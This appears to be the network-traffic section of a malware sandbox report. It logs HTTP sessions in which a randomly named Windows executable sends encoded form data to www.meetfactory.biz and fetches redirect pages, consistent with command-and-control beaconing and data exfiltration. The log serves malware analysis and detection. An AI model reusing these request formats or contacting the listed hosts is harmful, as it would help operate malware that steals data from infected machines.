                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                X-Redirect-By: WordPress
                                                Upgrade: h2,h2c
                                                Connection: Upgrade, close
                                                Location: http://asa-malukuutara.com/21hf/?ij60MtY=p1NLRLDpZ3jtk0f1dDjC0GqGJiZBNtu8Mrwl5djJtNb21C4BFG2Hr75FPHHV9wORgBrIYOW3JrKZkRWCMOhawA9p/CCB70kTn7w94dWnlsSq4AnfR/ra/5E=&wXB=brv4Erb
                                                Vary: Accept-Encoding
                                                Content-Length: 0
                                                Content-Type: text/html; charset=UTF-8


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                5192.168.11.204984696.126.123.244807116C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 07:58:47.033322096 CEST823OUTPOST /o0e7/ HTTP/1.1
                                                Host: www.meetfactory.biz
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.meetfactory.biz
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 204
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.meetfactory.biz/o0e7/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 38 46 47 42 68 55 63 56 59 46 6b 45 4d 67 4c 56 53 62 4e 55 74 42 64 75 63 59 56 55 51 64 49 78 42 51 42 6b 6c 55 49 78 54 36 64 66 63 34 52 30 6b 69 4c 33 67 6b 52 4f 6f 4c 64 74 71 57 6c 55 6f 77 78 43 35 49 38 46 6c 41 4f 71 41 5a 75 37 53 32 37 52 58 49 46 65 66 6e 37 42 71 47 4c 48 4b 56 4b 62 6f 30 4c 7a 33 59 41 74 68 36 56 72 63 70 55 61 6d 70 33 35 37 41 79 45 38 53 64 48 42 64 6f 4f 79 69 39 36 54 74 73 6c 51 68 49 67 77 30 68 2f 31 4e 56 35 61 68 4f 6b 7a 54 70 35 44 77 75 5a 6c 43 79 36 74 6f 74 6a 6a 56 61 62 6f 46 53 6e 6c 6d 77 71 51 4c 33 61 66 75 79 4d 6b 67 3d 3d
                                                Data Ascii: ij60MtY=8FGBhUcVYFkEMgLVSbNUtBducYVUQdIxBQBklUIxT6dfc4R0kiL3gkROoLdtqWlUowxC5I8FlAOqAZu7S27RXIFefn7BqGLHKVKbo0Lz3YAth6VrcpUamp357AyE8SdHBdoOyi96TtslQhIgw0h/1NV5ahOkzTp5DwuZlCy6totjjVaboFSnlmwqQL3afuyMkg==
                                                Aug 27, 2024 07:58:47.168495893 CEST803INHTTP/1.1 200 OK
                                                server: openresty/1.13.6.1
                                                date: Tue, 27 Aug 2024 05:58:47 GMT
                                                content-type: text/html
                                                transfer-encoding: chunked
                                                content-encoding: gzip
                                                connection: close
                                                Data Raw: 32 36 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 95 53 4d 73 9b 30 10 bd e7 57 50 0e 99 76 a6 e6 d3 29 76 03 e9 a4 34 c6 76 88 9d a4 4e b0 b9 64 84 a4 58 72 40 a2 20 c0 4e a7 ff bd 80 3b 31 1d f7 52 1d 90 76 d9 7d bb ef ad 64 bf fb 36 77 17 ab db 2b 89 88 24 be 38 b1 9b 4d 8a 01 5b 3b 32 66 f2 c5 89 54 2f 9b 60 80 f6 c7 d6 4c b0 00 12 24 20 cb b1 70 e4 87 c5 a8 37 f8 13 79 f8 4d 84 48 7b f8 47 41 4b 47 de f6 0a d0 83 3c 49 81 a0 51 8c 65 09 72 26 30 ab 73 27 57 0e 46 6b 7c 94 cd 40 82 1d b9 a4 b8 4a 79 26 3a 09 15 45 82 38 08 97 14 e2 5e 6b 7c 94 28 a3 82 82 b8 97 43 10 63 47 57 b4 2e 9c a0 22 c6 17 b6 ba df 5b 3a 6d 93 8c e7 30 a3 a9 38 d0 fa 77 ef 19 7e ce 70 4e 3a 2d 68 e7 45 16 3b 0d bf cf aa 5a 55 95 a5 29 09 c6 e2 19 40 c1 b3 9d 12 d1 57 55 96 d4 03 ae ad 1e d7 b2 5b 09 bb 1a 1d d7 39 fb 8f 3a b6 7a 18 91 1d 71 b4 93 38 8b 39 40 8e 8c f8 d3 fe f8 fe 43 57 96 3d 79 49 ec d2 5a 67 81 b7 42 dd 80 12 ec bd 9d b8 46 93 e7 82 41 41 39 93 3a 50 d2 cf 37 25 9b 90 66 55 94 21 5e 29 82 a7 4a cc 61 3d 69 ce [TRUNCATED]
                                                Data Ascii: 263SMs0WPv)v4vNdXr@ N;1Rv}d6w+$8M[;2fT/`L$ p7yMH{GAKG<IQer&0s'WFk|@Jy&:E8^k|(CcGW."[:m08w~pN:-hE;ZU)@WU[9:zq89@CW=yIZgBFAA9:P7%fU!^)Ja=iRI>u$e:&?EA[F2a)6}S.@0yszI}cPH}SwOw0yL4M9Ws:(L?py3?w'+c][y}9Fi IZIDnA0#QPYpU$4Jd<Rn(@./7b{,8 @EpI656:yv|h~Y\0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                6192.168.11.204984796.126.123.244807116C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 07:58:49.696741104 CEST1163OUTPOST /o0e7/ HTTP/1.1
                                                Host: www.meetfactory.biz
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.meetfactory.biz
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 544
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.meetfactory.biz/o0e7/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 38 46 47 42 68 55 63 56 59 46 6b 45 4e 42 37 56 52 34 56 55 71 68 64 74 54 34 56 55 5a 39 49 39 42 51 4e 6b 6c 56 4e 38 54 73 31 66 64 63 56 30 6c 6a 4c 33 74 45 52 4f 67 72 64 6f 75 57 6b 35 6f 77 39 38 35 49 41 46 6c 41 79 71 53 63 69 37 54 47 37 51 64 6f 46 52 59 6e 37 4d 38 32 4c 64 4b 55 33 77 6f 31 76 7a 33 75 30 74 69 38 35 72 62 34 55 5a 68 4a 33 33 76 77 79 48 33 79 64 4a 42 64 73 73 79 6a 56 41 53 66 77 6c 54 46 30 67 68 45 68 38 2f 39 56 30 56 42 50 54 79 7a 63 4e 61 6a 71 36 73 78 61 48 72 4a 52 44 2b 45 4b 67 70 48 6d 65 39 6e 4d 30 52 2f 47 78 4b 39 7a 64 36 66 37 31 36 72 54 4b 66 61 76 75 54 56 55 32 32 38 62 59 53 4d 6f 6c 38 39 62 63 43 52 77 38 70 74 51 4a 49 33 34 69 37 65 6d 6f 65 74 74 33 33 58 53 76 46 6d 5a 32 75 45 38 4a 7a 6d 2f 33 4c 31 55 64 4b 36 46 33 4d 48 37 74 51 4e 72 67 42 71 4c 67 47 46 72 4e 47 56 58 78 32 74 6f 39 73 2b 4c 73 77 75 4a 71 50 6f 56 32 42 39 67 67 63 49 50 5a 64 56 34 66 53 37 34 79 70 56 65 69 4d 7a 33 75 2f 50 6c 6b 4b 43 [TRUNCATED]
                                                Data Ascii: ij60MtY=8FGBhUcVYFkENB7VR4VUqhdtT4VUZ9I9BQNklVN8Ts1fdcV0ljL3tEROgrdouWk5ow985IAFlAyqSci7TG7QdoFRYn7M82LdKU3wo1vz3u0ti85rb4UZhJ33vwyH3ydJBdssyjVASfwlTF0ghEh8/9V0VBPTyzcNajq6sxaHrJRD+EKgpHme9nM0R/GxK9zd6f716rTKfavuTVU228bYSMol89bcCRw8ptQJI34i7emoett33XSvFmZ2uE8Jzm/3L1UdK6F3MH7tQNrgBqLgGFrNGVXx2to9s+LswuJqPoV2B9ggcIPZdV4fS74ypVeiMz3u/PlkKC+a4Xr4M7LU91pkjjUb0OK+rS/edroqXmilg6KDA0Mq1gTcRCkWT9NOTenqEsjoR2aYnp8qQid7PP5YhGvOWa98WdNpmB031qSB3LtYELnQBaMjPFJnSPD5laY5lYNSx6W7fPbdqro7vf17DWZuJ5VZ/f+DI9XGANxW2AiTkpPuTq5VQhRXqsVE8LdT9TPHKY/7rQYFcwJ8zWI=
                                                Aug 27, 2024 07:58:49.833240032 CEST803INHTTP/1.1 200 OK
                                                server: openresty/1.13.6.1
                                                date: Tue, 27 Aug 2024 05:58:49 GMT
                                                content-type: text/html
                                                transfer-encoding: chunked
                                                content-encoding: gzip
                                                connection: close
                                                Data Raw: 32 36 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 95 53 4d 73 9b 30 10 bd e7 57 50 0e 99 76 a6 36 5f 76 6d 1a 48 27 75 63 62 42 ec 24 75 82 cd 25 23 24 c5 92 03 12 05 01 26 9d fe f7 02 ee c4 74 dc 4b 75 40 da 65 f7 ed be b7 92 f5 ee db 62 b2 5c df 5e 4a 44 c4 d1 f9 89 d5 6c 52 04 d8 c6 96 31 93 cf 4f a4 7a 59 04 03 b4 3f b6 66 8c 05 90 20 01 69 86 85 2d 3f 2c a7 bd f1 9f c8 c3 6f 22 44 d2 c3 3f 72 5a d8 f2 ae 97 83 1e e4 71 02 04 0d 23 2c 4b 90 33 81 59 9d 3b bb b4 31 da e0 a3 6c 06 62 6c cb 05 c5 65 c2 53 d1 49 28 29 12 c4 46 b8 a0 10 f7 5a e3 a3 44 19 15 14 44 bd 0c 82 08 db 5a 5f ed c2 09 2a 22 7c 6e 29 fb bd a5 d3 36 c9 78 06 53 9a 88 03 ad 7f f7 9e e2 e7 14 67 a4 d3 82 7a 96 a7 91 dd f0 fb ac 28 65 59 8e d4 7e 8c b1 78 06 50 f0 b4 ea 87 f4 55 91 25 e5 80 6b 29 c7 b5 ac 56 c2 ae 46 c7 75 86 ff 51 c7 52 0e 23 b2 42 8e 2a 89 b3 88 03 64 cb 88 3f ed 8f ef 3f 74 65 d9 93 97 44 95 d4 3a 0b bc 13 ca 16 14 60 ef ed c4 35 9a 3c e7 0c 0a ca 99 d4 81 92 7e be 29 d9 84 34 ab a4 0c f1 b2 2f 78 d2 8f 38 ac 27 cd [TRUNCATED]
                                                Data Ascii: 263SMs0WPv6_vmH'ucbB$u%#$&tKu@eb\^JDlR1OzY?f i-?,o"D?rZq#,K3Y;1lbleSI()FZDDZ_*"|n)6xSgz(eY~xPU%k)VFuQR#B*d??teD:`5<~)4/x8'Y$[bIU<Ilt<F`d4prApMf`Bzz^VOa+7]:./`uSqeu<Y^u8@#G<gZBg|3"9QRs.~CG'$,n7Vn(;8Fo^95F^io0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                7192.168.11.204984896.126.123.244807116C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 07:58:52.368853092 CEST12890OUTPOST /o0e7/ HTTP/1.1
                                                Host: www.meetfactory.biz
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.meetfactory.biz
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 52932
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.meetfactory.biz/o0e7/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 38 46 47 42 68 55 63 56 59 46 6b 45 4e 42 37 56 52 34 56 55 71 68 64 74 54 34 56 55 5a 39 49 39 42 51 4e 6b 6c 56 4e 38 54 73 39 66 64 70 42 30 6b 41 7a 33 73 45 52 4f 75 4c 64 70 75 57 6c 37 6f 78 56 77 35 49 4e 77 6c 46 32 71 53 72 6d 37 55 30 6a 51 59 6f 46 63 57 48 37 43 71 47 4b 45 4b 56 4b 70 6f 78 2f 4e 33 63 55 74 68 2b 52 72 63 4c 38 61 72 35 33 35 76 77 79 4c 7a 79 63 6a 42 64 67 38 79 6a 5a 41 53 63 55 6c 52 33 4d 67 78 46 68 38 32 4e 56 31 63 68 50 6d 39 54 64 31 61 6a 2b 75 73 78 61 39 72 49 56 44 2b 48 79 67 6f 47 6d 5a 36 48 4d 30 5a 66 47 79 62 74 2f 5a 36 66 6e 54 36 75 76 4b 66 62 4c 75 53 31 55 32 38 39 62 62 51 73 6f 6a 34 39 62 74 47 52 4d 6b 70 70 34 64 49 7a 6f 69 37 4f 79 6f 63 63 74 33 6b 32 53 76 4d 6d 5a 77 67 6b 38 61 6c 57 2f 72 4c 31 45 42 4b 37 6c 6e 4d 48 50 74 51 74 4c 67 4b 6f 76 6e 57 31 71 47 4e 31 57 72 67 64 30 4c 73 2b 37 67 77 75 4a 36 50 71 6c 32 43 4e 51 67 62 4d 54 57 51 6c 34 59 47 4c 35 79 6e 31 53 34 4d 77 44 6d 2f 50 39 30 4b 44 [TRUNCATED]
                                                Data Ascii: ij60MtY=8FGBhUcVYFkENB7VR4VUqhdtT4VUZ9I9BQNklVN8Ts9fdpB0kAz3sEROuLdpuWl7oxVw5INwlF2qSrm7U0jQYoFcWH7CqGKEKVKpox/N3cUth+RrcL8ar535vwyLzycjBdg8yjZAScUlR3MgxFh82NV1chPm9Td1aj+usxa9rIVD+HygoGmZ6HM0ZfGybt/Z6fnT6uvKfbLuS1U289bbQsoj49btGRMkpp4dIzoi7Oyocct3k2SvMmZwgk8alW/rL1EBK7lnMHPtQtLgKovnW1qGN1Wrgd0Ls+7gwuJ6Pql2CNQgbMTWQl4YGL5yn1S4MwDm/P90KDqaqHr4IYjXvlpntzUJ6uKprS6/dokQXyaljuqDFkMrxATYYikQENNOTerUEsnoRHiYo5sqbSh7JP5ehGvbWahxWdFXmCt/1oeB3adYBKnTK6M6LFJwPfO/laELlYcnxNm7eLHduro45v14AWZ8N5YA/fy5I9TWAOxWznXx7Y73IZNFdhp6uNIW25Vpsy/WGeDA0hcxFxpWuCMhv3eQHjsokQXttdlqCmcbbix1Wzc1zUdVQ3bzgROnsCjC9ax8OHWC2eLitogRdl7T4GT6fcKl9XuVQOiGwHfZ3Od2c8Eug0lZdfv+GyNWdKm32Onfn3s1zw+0KVRfL6p+Y4uOzhCOwTN135cry/SkCGmJe3vJVgYDs4uBGF8SPP1Q6d6VXeCd0cyWOfSLvN83VPDWGRtEpMAzVK+xW+cre8UTiD8nBkl/k9Rsd3V87j37Z1djhZrU8/FKGPv1b+BnxABiwFtrjH5zdopaZLr+wsmFiiGOoTYwcpi2Ag5LA1cCZlTQzoFqFaaXZ48rEr6kDXa6bAUQW6o+hjSlEStYJd8wpyGKZe5rbPmoldPPg+Vk2h+AZGfiRhti2nMsMkExmwEwVkCChg42p/iE8GvGJZ1ER1qYoZRJx1btJtA2qavkaqwP1695RteoT6lbSIEbOjYv9hzxxYgtQyjWUqdo [TRUNCATED]
                                                Aug 27, 2024 07:58:52.502094984 CEST2578OUTData Raw: 75 6a 71 73 75 4c 5a 52 4e 56 2b 43 6f 4f 72 65 6b 33 45 46 6f 41 6d 7a 50 46 51 32 38 4e 44 6c 6d 4b 39 6e 47 50 2f 72 53 64 70 38 63 49 47 38 34 31 6d 76 4e 31 59 78 68 63 57 76 79 59 76 2f 6f 38 73 2f 55 62 4d 66 50 67 7a 33 63 31 72 75 4c 73
                                                Data Ascii: ujqsuLZRNV+CoOrek3EFoAmzPFQ28NDlmK9nGP/rSdp8cIG841mvN1YxhcWvyYv/o8s/UbMfPgz3c1ruLsUGeNTOu0sH9KinEFYdr23FWCPPTnKrJrRxiuq6OB1T8oZhNBQyOkD1X09UDJsYmRYKe/0hXASdbtQl0jGgPl/1xu030dusHdAkqm0Q8PWGRozPEJESEqNkpdKZUXOhxio9pCksWXF8TJQN7UslQFFUpbi0G7JRwvL
                                                Aug 27, 2024 07:58:52.502188921 CEST5156OUTData Raw: 30 4f 35 43 73 4f 54 5a 52 79 6d 55 52 6e 56 59 73 4d 6b 72 72 72 6e 66 6d 6d 31 34 32 4c 6e 6c 6c 2b 63 6a 72 57 76 70 33 52 41 4c 44 72 54 57 64 68 45 77 31 49 68 6a 78 2b 67 79 4f 72 7a 7a 45 34 54 2b 4a 48 38 5a 2b 78 70 39 73 49 6b 57 62 76
                                                Data Ascii: 0O5CsOTZRymURnVYsMkrrrnfmm142Lnll+cjrWvp3RALDrTWdhEw1Ihjx+gyOrzzE4T+JH8Z+xp9sIkWbvRhOH9/THf1+HJ+KF0mkz1fUZAv65QmJOENSqNhoKMDTC48wclPXyeKJy9xzXhxT9QGAVfU1bqN0rb96cQ9iwfWO2bmdRU22Kt+pqQscN9DoYy8fFuJ86ViwxlJix5ZFLam24lUKyLiaCAfQNMNyXnFboimNp0B/RX
                                                Aug 27, 2024 07:58:52.502243042 CEST2578OUTData Raw: 56 31 41 4e 65 5a 67 2f 34 41 75 6f 2f 41 42 37 68 73 76 36 49 44 54 5a 4a 69 63 4c 73 62 64 54 37 75 6f 37 53 32 71 67 57 4a 47 36 59 33 31 5a 50 36 6d 6f 47 7a 54 75 76 63 33 2b 70 4f 64 66 72 35 47 35 44 6f 67 73 69 30 4e 7a 6e 41 35 4f 41 35
                                                Data Ascii: V1ANeZg/4Auo/AB7hsv6IDTZJicLsbdT7uo7S2qgWJG6Y31ZP6moGzTuvc3+pOdfr5G5Dogsi0NznA5OA5VqBPUM4D6nBXGPVN/s6fcKtw0lW031kG3yTqxvqbSMYL3zRM8nUWS1jn/mDutVl7SqF4v3O+WtukrELUsDvE0o6QmCuCE9pbDafi0cIvqesbxRot4OVrrNEC9jcVfSYTGJ17JVDUeVzPnWoBTqPsxfA1BOiqy2bXW
                                                Aug 27, 2024 07:58:52.502429962 CEST10312OUTData Raw: 5a 67 79 43 78 58 4e 36 7a 55 47 69 4e 76 42 31 39 33 68 41 2f 6b 6a 59 2f 59 63 30 38 6d 45 61 41 58 61 6d 53 41 41 6d 35 7a 39 78 49 42 54 41 6a 7a 43 6c 74 53 4b 6e 78 2b 79 6f 75 50 56 2f 6c 2b 66 77 70 79 6a 63 64 78 73 44 76 6d 74 6c 42 7a
                                                Data Ascii: ZgyCxXN6zUGiNvB193hA/kjY/Yc08mEaAXamSAAm5z9xIBTAjzCltSKnx+youPV/l+fwpyjcdxsDvmtlBzw1zkrGSHXmB8Y/9gKI/8t/M/m39p9ENfd5vm7iuFcAwhrTKKHJERZA+QoEUwum4vxsDDVjOjuoylk7dhpUWLeNZezmSJ9jnkcBg7PItjpHe8aOu0EpfUN72Ys9kyGjQ4q5Jki/8WHpS8shnhmcjp3JjriEhcB7iWI
                                                Aug 27, 2024 07:58:52.502638102 CEST5156OUTData Raw: 63 61 79 61 71 48 45 77 69 7a 47 4d 33 46 34 41 32 6d 36 33 61 48 66 41 66 33 63 46 38 64 61 5a 6f 50 71 51 74 35 73 33 4a 58 76 54 6f 6d 4b 34 6d 58 6f 6d 67 7a 4c 6d 31 44 71 74 5a 30 78 64 56 69 2b 6b 54 78 76 76 48 57 72 65 72 35 2f 69 4a 74
                                                Data Ascii: cayaqHEwizGM3F4A2m63aHfAf3cF8daZoPqQt5s3JXvTomK4mXomgzLm1DqtZ0xdVi+kTxvvHWrer5/iJt/ntLVebAKB6yParMRNzRS6Ut94fIoyEuNVLL7/Wb7igTqFp3YPBOPosLSziq8G+aFpJzE26bzbnL/XRxB9B8W/j73K33n96tkCfm3G/7dK8uvXywiT+VjUXbDYxxFHef9tcQaqQe9BwVsOHW9RaxpUOko82hTY2tY
                                                Aug 27, 2024 07:58:52.503048897 CEST778INHTTP/1.1 413 Request Entity Too Large
                                                server: openresty/1.13.6.1
                                                date: Tue, 27 Aug 2024 05:58:52 GMT
                                                content-type: text/html
                                                content-length: 607
                                                connection: close
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 31 33 20 52 65 71 75 65 73 74 20 45 6e 74 69 74 79 20 54 6f 6f 20 4c 61 72 67 65 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 31 33 20 52 65 71 75 65 73 74 20 45 6e 74 69 74 79 20 54 6f 6f 20 4c 61 72 67 65 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 33 2e 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d [TRUNCATED]
                                                Data Ascii: <html><head><title>413 Request Entity Too Large</title></head><body bgcolor="white"><center><h1>413 Request Entity Too Large</h1></center><hr><center>openresty/1.13.6.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                Aug 27, 2024 07:58:52.635673046 CEST2578OUTData Raw: 76 36 2f 49 4e 37 38 4e 6e 44 54 44 53 31 52 4a 2f 44 54 51 4b 71 4f 48 69 63 65 53 44 49 64 44 59 58 6c 38 4a 57 44 31 48 76 4f 72 63 56 4c 68 35 73 56 59 37 70 6e 69 6d 2f 50 66 51 6e 38 53 71 6e 2b 75 51 72 4e 43 55 78 53 71 6e 36 32 64 35 48
                                                Data Ascii: v6/IN78NnDTDS1RJ/DTQKqOHiceSDIdDYXl8JWD1HvOrcVLh5sVY7pnim/PfQn8Sqn+uQrNCUxSqn62d5H05PVlHLwmOHGHOS0sjnij8P3t6R3u17IJPlIHo05Mwt6nP8CA8lKDiZA0gZhgdQwoj2qceIBYe9hbIa/L/HCVU5cGZ3bmCgdHeYUkDrtkgN1z17guseEvHfObJ0RrqkejDo56rXHHMAwzRK+eOrVP3Mc7jmsyPOgc
                                                Aug 27, 2024 07:58:52.635797024 CEST10312OUTData Raw: 54 39 74 58 76 50 75 53 50 73 6a 61 43 51 39 62 35 57 43 43 35 38 4e 39 36 79 70 32 55 6e 4d 2b 36 7a 54 55 66 6a 48 4c 39 67 59 55 6e 49 2f 63 38 45 41 70 56 31 55 49 4e 66 64 4e 33 2f 32 79 4c 30 42 68 55 5a 49 4e 51 58 35 44 74 46 48 70 4d 6f
                                                Data Ascii: T9tXvPuSPsjaCQ9b5WCC58N96yp2UnM+6zTUfjHL9gYUnI/c8EApV1UINfdN3/2yL0BhUZINQX5DtFHpMoBSSlc6MwW9b6oRlBpDD4PoFhzWJ/0PHwr5fbffex9uDI/rtmS/glfJfj13WyuJJYgTWFTAqy4gv+s53jrCwStGYrARKsW1gTKZS7q20logvEteGvlpKSEl3jyKTB6ckq25UHrdBDeNbfzDM7A2vp70DlgUh6AOa6L
                                                Aug 27, 2024 07:58:52.635862112 CEST2000OUTData Raw: 49 45 6b 63 78 67 59 6b 69 77 4a 49 43 4f 68 61 30 4b 6f 38 37 49 6c 6b 2b 41 53 63 4b 68 64 6b 4b 63 68 50 55 50 74 44 76 46 4d 62 77 55 34 4c 78 65 6c 43 66 4e 61 2f 69 46 38 62 53 6b 35 4f 49 78 4b 77 5a 64 31 66 35 73 77 79 32 4d 34 67 6d 34
                                                Data Ascii: IEkcxgYkiwJICOha0Ko87Ilk+AScKhdkKchPUPtDvFMbwU4LxelCfNa/iF8bSk5OIxKwZd1f5swy2M4gm4MRC0//a75XI+fsjjfI/ejAJtgmY+8bE+aZdE8uyxguIpiK1oVkoRKVXdVl9J8BeGF69fHzw/LXfsTOLwRoC5A2K3OgQpkKYDzp4isVN/jfNApJ55A9urXFIs93v5H1cRVzgbCNMoXRJvixInq06wAGEyCBjdGm8ON


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                8192.168.11.204984996.126.123.244807116C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 07:58:55.036791086 CEST549OUTGET /o0e7/?ij60MtY=xHuhihA5a0RCQDr7UqpawT1cYL9BOqgbdgZ3/38wD7lrSrU6llHUt19Sg65W4AIkiHRz640OtFHlOrepbmqCRMN0Rn3a8HvHNm6R1WOOyMUaxc5SdqEBk4o=&wXB=brv4Erb HTTP/1.1
                                                Host: www.meetfactory.biz
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Language: en-us
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 07:58:55.172287941 CEST1289INHTTP/1.1 200 OK
                                                server: openresty/1.13.6.1
                                                date: Tue, 27 Aug 2024 05:58:55 GMT
                                                content-type: text/html
                                                transfer-encoding: chunked
                                                connection: close
                                                Data Raw: 34 39 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 37 30 2e 6d 65 65 74 66 61 63 [TRUNCATED]
                                                Data Ascii: 498<!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="x-ua-compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title></title> <noscript> <meta http-equiv="refresh" content="0;url=http://www70.meetfactory.biz/" /> </noscript> <meta http-equiv="refresh" content="5;url=http://www70.meetfactory.biz/" /> </head> <body onload="do_onload()"> <script type="text/javascript"> function do_onload() { window.top.location.href = 